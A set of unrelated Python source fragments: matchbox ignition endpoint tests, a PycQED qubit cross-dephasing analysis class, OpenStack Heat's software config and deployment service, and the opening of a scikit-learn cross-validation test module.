expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,BySelectorOne%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
def test_ignition_2(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac_two))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,BySelectorTwo%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
def test_ignition_3(self):
request = requests.get("%s/ignition?mac=%s" % (self.matchbox_endpoint, self.mac_three))
response = request.content
request.close()
ign_resp = json.loads(response.decode())
expect = {
u'networkd': {},
u'passwd': {},
u'systemd': {},
u'storage': {
u'files': [
{
u'group': {},
u'user': {},
u'filesystem': u'root',
u'path': u'/tmp/selector',
u'contents': {
u'source': u'data:,NoSelector%0A', u'verification': {}
},
u'mode': 420}]
},
u'ignition': {u'version': u'2.0.0', u'config': {}}}
self.assertEqual(ign_resp, expect)
|
|
'''
Toolset to analyse measurement-induced Dephasing of qubits
Hacked together by Rene Vollmer
'''
import pycqed
from pycqed.analysis_v2.quantum_efficiency_analysis import DephasingAnalysisSweep
import pycqed.analysis_v2.base_analysis as ba
import numpy as np
from collections import OrderedDict
import copy
import datetime
import os
from pycqed.analysis import analysis_toolbox as a_tools
import numpy as np
import numpy.ma
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
class CrossDephasingAnalysis(ba.BaseDataAnalysis):
'''
Analyses measurement-induced Dephasing of qubits.
options_dict options:
- The inherited options from BaseDataAnalysis
- The inherited options from DephasingAnalysis
-
'''
def __init__(self, qubit_labels: list,
t_start: str = None, t_stop: str = None,
label_pattern: str = 'ro_amp_sweep_dephasing_trgt_{TQ}_measured_{RQ}',
options_dict: dict = None,
extract_only: bool = False, auto: bool = True,
close_figs: bool = True, do_fitting: bool = True,
relative_contrast=False):
super().__init__(t_start=t_start, t_stop=t_stop,
label=label_pattern,
options_dict=options_dict,
do_fitting=do_fitting,
close_figs=close_figs,
extract_only=extract_only)
self.label_pattern = label_pattern
self.qubit_labels = qubit_labels
self.ra = np.array([[None] * len(qubit_labels)] * len(qubit_labels))
d = copy.deepcopy(self.options_dict)
d['save_figs'] = False
for i, tq in enumerate(qubit_labels):
for j, rq in enumerate(qubit_labels):
label = label_pattern.replace('{TQ}', tq).replace('{RQ}', rq)
self.ra[i, j] = DephasingAnalysisSweep(
t_start=t_start,
t_stop=t_stop,
label=label, options_dict=d,
auto=False, extract_only=True)
#TODO: add option to use DephasingAnalysisSingleScans instead
if auto:
self.run_analysis()
def extract_data(self):
ts = []
for i, tq in enumerate(self.qubit_labels):
for j, rq in enumerate(self.qubit_labels):
ra = self.ra[i, j]
ra.extract_data()
ts.append(np.max(ra.raw_data_dict['datetime']))
youngest = np.max(ts)
youngest += datetime.timedelta(seconds=1)
self.raw_data_dict = OrderedDict()
self.raw_data_dict['datetime'] = [youngest]
self.raw_data_dict['timestamps'] = [youngest.strftime("%Y%m%d_%H%M%S")]
self.timestamps = [youngest.strftime("%Y%m%d_%H%M%S")]
f = '%s_measurement_cross_dephasing_analysis' % (youngest.strftime("%H%M%S"))
d = '%s' % (youngest.strftime("%Y%m%d"))
folder = os.path.join(a_tools.datadir, d, f)
self.raw_data_dict['folder'] = [folder]
self.options_dict['analysis_result_file'] = os.path.join(folder, f + '.hdf5')
def run_fitting(self):
qubit_labels = self.qubit_labels
self.fit_dicts = OrderedDict()
self.fit_res = OrderedDict()
self.fit_dicts['sigmas'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
self.fit_dicts['sigmas_phase'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
self.fit_dicts['sigmas_norm'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
self.fit_dicts['deph_norm'] = np.array(
[[None] * len(qubit_labels)] * len(qubit_labels), dtype=float)
#self.fit_res['coherence_fit'] = np.array(
# [[None] * len(qubit_labels)] * len(qubit_labels), dtype=object)
for i, tq in enumerate(qubit_labels):
for j, rq in enumerate(qubit_labels):
ra = self.ra[i, j]
ra.run_analysis()
for i, tq in enumerate(qubit_labels):
c = self.ra[i, i].fit_res['coherence_phase_fit'].params['c'].value
for j, rq in enumerate(qubit_labels):
ra = self.ra[i, j]
df = ra.fit_res['coherence_fit']
dpf = ra.fit_res['coherence_phase_fit']
self.fit_res['coherence_fit_'+tq+'_'+rq] = df
self.fit_dicts['sigmas'][i, j] = df.params['sigma'].value
s = dpf.params['s'].value
self.fit_dicts['sigmas_phase'][i, j] = 1/(s*np.sqrt(-c))
self.fit_dicts['sigmas_norm'][i,:] = self.fit_dicts['sigmas'][i,:] / self.fit_dicts['sigmas'][i, i]
self.fit_dicts['deph_norm'][i,:] = self.fit_dicts['sigmas'][i, i] / self.fit_dicts['sigmas'][i,:]
def prepare_plots(self):
pt = '\n'
t = self.timestamps[0]
self.plot_dicts['sigmas'] = {
'plotfn': self.plot_labeled_2d,
'title': t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['sigmas'],
'zlabel': r'Dephasing Gauss width $\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['sigmas_phase'] = {
'plotfn': self.plot_labeled_2d,
'title': 'Sigmas concluded from Phase' + pt + t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['sigmas_phase'],
'zlabel': r'Dephasing Gauss width $\bar{\sigma}$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['sigmas_norm'] = {
'plotfn': self.plot_labeled_2d,
'title': 'Normalized by targetted Qubit' + pt + t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['sigmas_norm'],
'zlabel': r'Normalized Dephasing Gauss width $\sigma$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
self.plot_dicts['deph_norm'] = {
'plotfn': self.plot_norm_matrix,
'title': 'Normalized by targetted Qubit' + pt + t,
'yvals': self.qubit_labels, 'ylabel': 'Targeted Qubit', 'yunit': '',
'xvals': self.qubit_labels, 'xlabel': 'Dephased Qubit', 'xunit': '',
'zvals': self.fit_dicts['deph_norm'],
'zlabel': r'Normalized Inverse Dephasing Gauss width $\sigma^{-1}$',
'plotsize': self.options_dict.get('plotsize', None),
'cmap': self.options_dict.get('cmap', 'YlGn_r'),
}
for i, tq in enumerate(self.qubit_labels):
for j, rq in enumerate(self.qubit_labels):
ra = self.ra[i, j]
label = self.label_pattern.replace('{TQ}', tq)
label = label.replace('{RQ}', rq)
for p in ra.plot_dicts:
self.plot_dicts[p+label] = ra.plot_dicts[p]
self.plot_dicts[p+label]['ax_id'] = self.plot_dicts[p+label].get('ax_id', '')+label
t = self.plot_dicts[p+label].get('title', 'Coherence ')
t += '\n' + 'Target: '+tq+', Meas.: '+rq
#t += '\n' + label
self.plot_dicts[p+label]['title'] = t
def plot_labeled_2d(self, pdict, axs):
xl = pdict.get('xvals')
yl = pdict.get('yvals')
z = pdict.get('zvals')
xn = np.array(range(len(xl)))+0.5
yn = np.array(range(len(yl)))+0.5
pdict['xvals'] = xn
pdict['yvals'] = -yn
pdict['zrange'] = (0, np.max(z))
self.plot_colorxy(pdict=pdict, axs=axs)
axs.yaxis.set_ticklabels(yl)
axs.yaxis.set_ticks(-yn)
axs.xaxis.set_ticklabels(xl)
axs.xaxis.set_ticks(xn)
axs.cbar.set_label(pdict.get('zlabel', ''))
def plot_norm_matrix(self, pdict, axs):
fig = axs.figure
xl = pdict.get('xvals')
yl = pdict.get('yvals')
z = pdict.get('zvals')
xn = np.array(range(len(xl)))
yn = np.array(range(len(yl)))
diag_matrix = np.zeros_like(z, dtype=bool)
for i in range(len(diag_matrix)):
diag_matrix[i, i] = True
off_diagonal = numpy.ma.masked_array(z, diag_matrix)
diagonal = numpy.ma.masked_array(z, diag_matrix == False)
# axins1 = inset_axes(parent_axes=axs,
# width="4%", # width = 10% of parent_bbox width
# height="45%", # height : 50%
# loc=2,
# bbox_to_anchor=(1.03, 0., 1, 1),
# bbox_transform=axs.transAxes,
# borderpad=0,
# )
pa = axs.imshow(diagonal, cmap='Reds', vmax=1, vmin=0.95)
#cba = fig.colorbar(pa, cax=axins1)
axins2 = inset_axes(parent_axes=axs,
width="4%", # width = 10% of parent_bbox width
height="100%", # height : 50%
loc=3,
bbox_to_anchor=(1.03, 0., 1, 1),
bbox_transform=axs.transAxes,
borderpad=0,
)
pb = axs.imshow(off_diagonal, cmap='Blues',
vmin=0, vmax=max(np.max(off_diagonal), 0.01))
cbb = fig.colorbar(pb, cax=axins2)
axs.yaxis.set_ticklabels(yl)
axs.yaxis.set_ticks(yn)
axs.xaxis.set_ticklabels(xl)
axs.xaxis.set_ticks(xn)
#axs.cbar.set_label(pdict.get('zlabel', ''))
def plot_double_matrix(self, pdict, axs):
fig = axs.figure
xl = pdict.get('xvals')
yl = pdict.get('yvals')
z = pdict.get('zvals')
xn = np.array(range(len(xl)))
yn = np.array(range(len(yl)))
diag_matrix = np.zeros_like(z, dtype=bool)
for i in range(len(diag_matrix)):
diag_matrix[i, i] = True
off_diagonal = numpy.ma.masked_array(z, diag_matrix)
diagonal = numpy.ma.masked_array(z, diag_matrix == False)
axins1 = inset_axes(parent_axes=axs,
width="4%", # width = 10% of parent_bbox width
height="45%", # height : 50%
loc=2,
bbox_to_anchor=(1.03, 0., 1, 1),
bbox_transform=axs.transAxes,
borderpad=0,
)
pa = axs.imshow(diagonal, cmap='Reds', vmax=1,
vmin=min(np.min(diagonal), 0.99))
cba = fig.colorbar(pa, cax=axins1)
axins2 = inset_axes(parent_axes=axs,
width="4%", # width = 10% of parent_bbox width
height="100%", # height : 50%
loc=3,
bbox_to_anchor=(1.03, 0., 1, 1),
bbox_transform=axs.transAxes,
borderpad=0,
)
pb = axs.imshow(off_diagonal, cmap='Blues_r',
vmin=0, vmax=max(np.max(off_diagonal),0.01))
cbb = fig.colorbar(pb, cax=axins2)
axs.yaxis.set_ticklabels(yl)
axs.yaxis.set_ticks(yn)
axs.xaxis.set_ticklabels(xl)
axs.xaxis.set_ticks(xn)
#axs.cbar.set_label(pdict.get('zlabel', ''))
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_db import api as oslo_db_api
from oslo_db import exception as db_exc
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_service import service
from oslo_utils import timeutils
import requests
import six
from six.moves.urllib import parse as urlparse
from heat.common import exception
from heat.common.i18n import _
from heat.common.i18n import _LI
from heat.db import api as db_api
from heat.engine import api
from heat.objects import software_config as software_config_object
from heat.objects import software_deployment as software_deployment_object
from heat.rpc import api as rpc_api
LOG = logging.getLogger(__name__)
class SoftwareConfigService(service.Service):
def show_software_config(self, cnxt, config_id):
sc = software_config_object.SoftwareConfig.get_by_id(cnxt, config_id)
return api.format_software_config(sc)
def list_software_configs(self, cnxt, limit=None, marker=None,
tenant_safe=True):
scs = software_config_object.SoftwareConfig.get_all(
cnxt,
limit=limit,
marker=marker,
tenant_safe=tenant_safe)
result = [api.format_software_config(sc, detail=False) for sc in scs]
return result
def create_software_config(self, cnxt, group, name, config,
inputs, outputs, options):
sc = software_config_object.SoftwareConfig.create(cnxt, {
'group': group,
'name': name,
'config': {
'inputs': inputs,
'outputs': outputs,
'options': options,
'config': config
},
'tenant': cnxt.tenant_id})
return api.format_software_config(sc)
def delete_software_config(self, cnxt, config_id):
software_config_object.SoftwareConfig.delete(cnxt, config_id)
def list_software_deployments(self, cnxt, server_id):
all_sd = software_deployment_object.SoftwareDeployment.get_all(
cnxt, server_id)
result = [api.format_software_deployment(sd) for sd in all_sd]
return result
def metadata_software_deployments(self, cnxt, server_id):
if not server_id:
raise ValueError(_('server_id must be specified'))
all_sd = software_deployment_object.SoftwareDeployment.get_all(
cnxt, server_id)
# sort the configs by config name, to give the list of metadata a
# deterministic and controllable order.
all_sd_s = sorted(all_sd, key=lambda sd: sd.config.name)
result = [api.format_software_config(sd.config) for sd in all_sd_s]
return result
@oslo_db_api.wrap_db_retry(max_retries=10, retry_on_request=True)
def _push_metadata_software_deployments(self, cnxt, server_id, sd):
rs = db_api.resource_get_by_physical_resource_id(cnxt, server_id)
if not rs:
return
deployments = self.metadata_software_deployments(cnxt, server_id)
md = rs.rsrc_metadata or {}
md['deployments'] = deployments
rows_updated = db_api.resource_update(
cnxt, rs.id, {'rsrc_metadata': md}, rs.atomic_key)
if not rows_updated:
raise db_exc.RetryRequest(
exception.DeploymentConcurrentTransaction(server=server_id))
metadata_put_url = None
metadata_queue_id = None
for rd in rs.data:
if rd.key == 'metadata_put_url':
metadata_put_url = rd.value
if rd.key == 'metadata_queue_id':
metadata_queue_id = rd.value
if metadata_put_url:
json_md = jsonutils.dumps(md)
requests.put(metadata_put_url, json_md)
if metadata_queue_id:
zaqar_plugin = cnxt.clients.client_plugin('zaqar')
zaqar = zaqar_plugin.create_for_tenant(sd.stack_user_project_id)
queue = zaqar.queue(metadata_queue_id)
queue.post({'body': md, 'ttl': zaqar_plugin.DEFAULT_TTL})
def _refresh_swift_software_deployment(self, cnxt, sd, deploy_signal_id):
container, object_name = urlparse.urlparse(
deploy_signal_id).path.split('/')[-2:]
swift_plugin = cnxt.clients.client_plugin('swift')
swift = swift_plugin.client()
try:
headers = swift.head_object(container, object_name)
except Exception as ex:
# ignore not-found, in case swift is not consistent yet
if swift_plugin.is_not_found(ex):
LOG.info(_LI('Signal object not found: %(c)s %(o)s'), {
'c': container, 'o': object_name})
return sd
raise ex
lm = headers.get('last-modified')
last_modified = swift_plugin.parse_last_modified(lm)
prev_last_modified = sd.updated_at
if prev_last_modified:
# assume stored as utc, convert to offset-naive datetime
prev_last_modified = prev_last_modified.replace(tzinfo=None)
if prev_last_modified and (last_modified <= prev_last_modified):
return sd
try:
(headers, obj) = swift.get_object(container, object_name)
except Exception as ex:
# ignore not-found, in case swift is not consistent yet
if swift_plugin.is_not_found(ex):
LOG.info(_LI(
'Signal object not found: %(c)s %(o)s'), {
'c': container, 'o': object_name})
return sd
raise ex
if obj:
self.signal_software_deployment(
cnxt, sd.id, jsonutils.loads(obj),
last_modified.isoformat())
return software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, sd.id)
def _refresh_zaqar_software_deployment(self, cnxt, sd, deploy_queue_id):
zaqar_plugin = cnxt.clients.client_plugin('zaqar')
zaqar = zaqar_plugin.create_for_tenant(sd.stack_user_project_id)
queue = zaqar.queue(deploy_queue_id)
messages = list(queue.pop())
if messages:
self.signal_software_deployment(
cnxt, sd.id, messages[0].body, None)
return software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, sd.id)
def show_software_deployment(self, cnxt, deployment_id):
sd = software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, deployment_id)
if sd.status == rpc_api.SOFTWARE_DEPLOYMENT_IN_PROGRESS:
c = sd.config.config
input_values = dict((i['name'], i['value']) for i in c['inputs'])
transport = input_values.get('deploy_signal_transport')
if transport == 'TEMP_URL_SIGNAL':
sd = self._refresh_swift_software_deployment(
cnxt, sd, input_values.get('deploy_signal_id'))
elif transport == 'ZAQAR_SIGNAL':
sd = self._refresh_zaqar_software_deployment(
cnxt, sd, input_values.get('deploy_queue_id'))
return api.format_software_deployment(sd)
def create_software_deployment(self, cnxt, server_id, config_id,
input_values, action, status,
status_reason, stack_user_project_id):
sd = software_deployment_object.SoftwareDeployment.create(cnxt, {
'config_id': config_id,
'server_id': server_id,
'input_values': input_values,
'tenant': cnxt.tenant_id,
'stack_user_project_id': stack_user_project_id,
'action': action,
'status': status,
'status_reason': status_reason})
self._push_metadata_software_deployments(cnxt, server_id, sd)
return api.format_software_deployment(sd)
def signal_software_deployment(self, cnxt, deployment_id, details,
updated_at):
if not deployment_id:
raise ValueError(_('deployment_id must be specified'))
sd = software_deployment_object.SoftwareDeployment.get_by_id(
cnxt, deployment_id)
status = sd.status
if not status == rpc_api.SOFTWARE_DEPLOYMENT_IN_PROGRESS:
# output values are only expected when in an IN_PROGRESS state
return
details = details or {}
output_status_code = rpc_api.SOFTWARE_DEPLOYMENT_OUTPUT_STATUS_CODE
ov = sd.output_values or {}
status = None
status_reasons = {}
status_code = details.get(output_status_code)
if status_code and str(status_code) != '0':
status = rpc_api.SOFTWARE_DEPLOYMENT_FAILED
status_reasons[output_status_code] = _(
'Deployment exited with non-zero status code: %s'
) % details.get(output_status_code)
event_reason = 'deployment failed (%s)' % status_code
else:
event_reason = 'deployment succeeded'
for output in sd.config.config['outputs'] or []:
out_key = output['name']
if out_key in details:
ov[out_key] = details[out_key]
if output.get('error_output', False):
status = rpc_api.SOFTWARE_DEPLOYMENT_FAILED
status_reasons[out_key] = details[out_key]
event_reason = 'deployment failed'
for out_key in rpc_api.SOFTWARE_DEPLOYMENT_OUTPUTS:
ov[out_key] = details.get(out_key)
if status == rpc_api.SOFTWARE_DEPLOYMENT_FAILED:
# build a status reason out of all of the values of outputs
# flagged as error_output
status_reasons = [' : '.join((k, six.text_type(status_reasons[k])))
for k in status_reasons]
status_reason = ', '.join(status_reasons)
else:
status = rpc_api.SOFTWARE_DEPLOYMENT_COMPLETE
status_reason = _('Outputs received')
self.update_software_deployment(
cnxt, deployment_id=deployment_id,
output_values=ov, status=status, status_reason=status_reason,
config_id=None, input_values=None, action=None,
updated_at=updated_at)
# Return a string describing the outcome of handling the signal data
return event_reason
def update_software_deployment(self, cnxt, deployment_id, config_id,
input_values, output_values, action,
status, status_reason, updated_at):
update_data = {}
if config_id:
update_data['config_id'] = config_id
if input_values:
update_data['input_values'] = input_values
if output_values:
update_data['output_values'] = output_values
if action:
update_data['action'] = action
if status:
update_data['status'] = status
if status_reason:
update_data['status_reason'] = status_reason
if updated_at:
update_data['updated_at'] = timeutils.normalize_time(
timeutils.parse_isotime(updated_at))
else:
update_data['updated_at'] = timeutils.utcnow()
sd = software_deployment_object.SoftwareDeployment.update_by_id(
cnxt, deployment_id, update_data)
# only push metadata if this update resulted in the config_id
# changing, since metadata is just a list of configs
if config_id:
self._push_metadata_software_deployments(cnxt, sd.server_id, sd)
return api.format_software_deployment(sd)
def delete_software_deployment(self, cnxt, deployment_id):
software_deployment_object.SoftwareDeployment.delete(
cnxt, deployment_id)
|
|
"""Test the validation module"""
from __future__ import division
import sys
import warnings
import tempfile
import os
from time import sleep
import numpy as np
from scipy.sparse import coo_matrix, csr_matrix
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_warns
from sklearn.utils.mocking import CheckingClassifier, MockDataFrame
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import permutation_test_score
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import LeaveOneOut
from sklearn.model_selection import LeaveOneLabelOut
from sklearn.model_selection import LeavePLabelOut
from sklearn.model_selection import LabelKFold
from sklearn.model_selection import LabelShuffleSplit
from sklearn.model_selection import learning_curve
from sklearn.model_selection import validation_curve
from sklearn.model_selection._validation import _check_is_permutation
from sklearn.datasets import make_regression
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.metrics import explained_variance_score
from sklearn.metrics import make_scorer
from sklearn.metrics import precision_score
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.cluster import KMeans
from sklearn.preprocessing import Imputer
from sklearn.pipeline import Pipeline
from sklearn.externals.six.moves import cStringIO as StringIO
from sklearn.base import BaseEstimator
from sklearn.multiclass import OneVsRestClassifier
from sklearn.utils import shuffle
from sklearn.datasets import make_classification
from sklearn.datasets import make_multilabel_classification
from sklearn.model_selection.tests.test_split import MockClassifier
try:
WindowsError
except NameError:
WindowsError = None
class MockImprovingEstimator(BaseEstimator):
"""Dummy classifier to test the learning curve"""
def __init__(self, n_max_train_sizes):
self.n_max_train_sizes = n_max_train_sizes
self.train_sizes = 0
self.X_subset = None
def fit(self, X_subset, y_subset=None):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, Y=None):
# training score becomes worse (2 -> 1), test error better (0 -> 1)
if self._is_training_data(X):
return 2. - float(self.train_sizes) / self.n_max_train_sizes
else:
return float(self.train_sizes) / self.n_max_train_sizes
def _is_training_data(self, X):
return X is self.X_subset
class MockIncrementalImprovingEstimator(MockImprovingEstimator):
"""Dummy classifier that provides partial_fit"""
def __init__(self, n_max_train_sizes):
super(MockIncrementalImprovingEstimator,
self).__init__(n_max_train_sizes)
self.x = None
def _is_training_data(self, X):
return self.x in X
def partial_fit(self, X, y=None, **params):
self.train_sizes += X.shape[0]
self.x = X[0]
class MockEstimatorWithParameter(BaseEstimator):
"""Dummy classifier to test the validation curve"""
def __init__(self, param=0.5):
self.X_subset = None
self.param = param
def fit(self, X_subset, y_subset):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, y=None):
return self.param if self._is_training_data(X) else 1 - self.param
def _is_training_data(self, X):
return X is self.X_subset
# XXX: use 2D array, since 1D X is being detected as a single sample in
# check_consistent_length
X = np.ones((10, 2))
X_sparse = coo_matrix(X)
y = np.array([0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
# The number of samples per class needs to be > n_splits,
# for StratifiedKFold(n_splits=3)
y2 = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3, 3])
def test_cross_val_score():
clf = MockClassifier()
for a in range(-10, 10):
clf.a = a
# Smoke test
scores = cross_val_score(clf, X, y2)
assert_array_equal(scores, clf.score(X, y2))
# test with multioutput y
multioutput_y = np.column_stack([y2, y2[::-1]])
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
scores = cross_val_score(clf, X_sparse, y2)
assert_array_equal(scores, clf.score(X_sparse, y2))
# test with multioutput y
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
scores = cross_val_score(clf, X.tolist(), y2.tolist())
clf = CheckingClassifier(check_y=list_check)
scores = cross_val_score(clf, X, y2.tolist())
assert_raises(ValueError, cross_val_score, clf, X, y2, scoring="sklearn")
# test with 3d X and
X_3d = X[:, :, np.newaxis]
clf = MockClassifier(allow_nd=True)
scores = cross_val_score(clf, X_3d, y2)
clf = MockClassifier(allow_nd=False)
assert_raises(ValueError, cross_val_score, clf, X_3d, y2)
def test_cross_val_score_predict_labels():
# Check if ValueError (when labels is None) propagates to cross_val_score
# and cross_val_predict
# And also check if labels is correctly passed to the cv object
X, y = make_classification(n_samples=20, n_classes=2, random_state=0)
clf = SVC(kernel="linear")
label_cvs = [LeaveOneLabelOut(), LeavePLabelOut(2), LabelKFold(),
LabelShuffleSplit()]
for cv in label_cvs:
assert_raise_message(ValueError,
"The labels parameter should not be None",
cross_val_score, estimator=clf, X=X, y=y, cv=cv)
assert_raise_message(ValueError,
"The labels parameter should not be None",
cross_val_predict, estimator=clf, X=X, y=y, cv=cv)
def test_cross_val_score_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
# 3 fold cross val is used so we need atleast 3 samples per class
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_score(clf, X_df, y_ser)
def test_cross_val_score_mask():
# test that cross_val_score works with boolean masks
svm = SVC(kernel="linear")
iris = load_iris()
X, y = iris.data, iris.target
kfold = KFold(5)
scores_indices = cross_val_score(svm, X, y, cv=kfold)
kfold = KFold(5)
cv_masks = []
for train, test in kfold.split(X, y):
mask_train = np.zeros(len(y), dtype=np.bool)
mask_test = np.zeros(len(y), dtype=np.bool)
mask_train[train] = 1
mask_test[test] = 1
cv_masks.append((train, test))
scores_masks = cross_val_score(svm, X, y, cv=cv_masks)
assert_array_equal(scores_indices, scores_masks)
def test_cross_val_score_precomputed():
# test for svm with precomputed kernel
svm = SVC(kernel="precomputed")
iris = load_iris()
X, y = iris.data, iris.target
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(svm, linear_kernel, y)
svm = SVC(kernel="linear")
score_linear = cross_val_score(svm, X, y)
assert_array_equal(score_precomputed, score_linear)
# Error raised for non-square X
svm = SVC(kernel="precomputed")
assert_raises(ValueError, cross_val_score, svm, X, y)
# test error is raised when the precomputed kernel is not array-like
# or sparse
assert_raises(ValueError, cross_val_score, svm,
linear_kernel.tolist(), y)
def test_cross_val_score_fit_params():
clf = MockClassifier()
n_samples = X.shape[0]
n_classes = len(np.unique(y))
W_sparse = coo_matrix((np.array([1]), (np.array([1]), np.array([0]))),
shape=(10, 1))
P_sparse = coo_matrix(np.eye(5))
DUMMY_INT = 42
DUMMY_STR = '42'
DUMMY_OBJ = object()
def assert_fit_params(clf):
# Function to test that the values are passed correctly to the
# classifier arguments for non-array type
assert_equal(clf.dummy_int, DUMMY_INT)
assert_equal(clf.dummy_str, DUMMY_STR)
assert_equal(clf.dummy_obj, DUMMY_OBJ)
fit_params = {'sample_weight': np.ones(n_samples),
'class_prior': np.ones(n_classes) / n_classes,
'sparse_sample_weight': W_sparse,
'sparse_param': P_sparse,
'dummy_int': DUMMY_INT,
'dummy_str': DUMMY_STR,
'dummy_obj': DUMMY_OBJ,
'callback': assert_fit_params}
cross_val_score(clf, X, y, fit_params=fit_params)
def test_cross_val_score_score_func():
clf = MockClassifier()
_score_func_args = []
def score_func(y_test, y_predict):
_score_func_args.append((y_test, y_predict))
return 1.0
with warnings.catch_warnings(record=True):
scoring = make_scorer(score_func)
score = cross_val_score(clf, X, y, scoring=scoring)
assert_array_equal(score, [1.0, 1.0, 1.0])
assert len(_score_func_args) == 3
def test_cross_val_score_errors():
class BrokenEstimator:
pass
assert_raises(TypeError, cross_val_score, BrokenEstimator(), X)
def test_cross_val_score_with_score_func_classification():
iris = load_iris()
clf = SVC(kernel='linear')
# Default score (should be the accuracy score)
scores = cross_val_score(clf, iris.data, iris.target, cv=5)
assert_array_almost_equal(scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# Correct classification score (aka. zero / one score) - should be the
# same as the default estimator score
zo_scores = cross_val_score(clf, iris.data, iris.target,
scoring="accuracy", cv=5)
assert_array_almost_equal(zo_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
# F1 score (class are balanced so f1_score should be equal to zero/one
# score
f1_scores = cross_val_score(clf, iris.data, iris.target,
scoring="f1_weighted", cv=5)
assert_array_almost_equal(f1_scores, [0.97, 1., 0.97, 0.97, 1.], 2)
def test_cross_val_score_with_score_func_regression():
X, y = make_regression(n_samples=30, n_features=20, n_informative=5,
random_state=0)
reg = Ridge()
# Default score of the Ridge regression estimator
scores = cross_val_score(reg, X, y, cv=5)
assert_array_almost_equal(scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# R2 score (aka. determination coefficient) - should be the
# same as the default estimator score
r2_scores = cross_val_score(reg, X, y, scoring="r2", cv=5)
assert_array_almost_equal(r2_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
# Mean squared error; this is a loss function, so "scores" are negative
mse_scores = cross_val_score(reg, X, y, cv=5, scoring="mean_squared_error")
expected_mse = np.array([-763.07, -553.16, -274.38, -273.26, -1681.99])
assert_array_almost_equal(mse_scores, expected_mse, 2)
# Explained variance
scoring = make_scorer(explained_variance_score)
ev_scores = cross_val_score(reg, X, y, cv=5, scoring=scoring)
assert_array_almost_equal(ev_scores, [0.94, 0.97, 0.97, 0.99, 0.92], 2)
def test_permutation_score():
iris = load_iris()
X = iris.data
X_sparse = coo_matrix(X)
y = iris.target
svm = SVC(kernel='linear')
cv = StratifiedKFold(2)
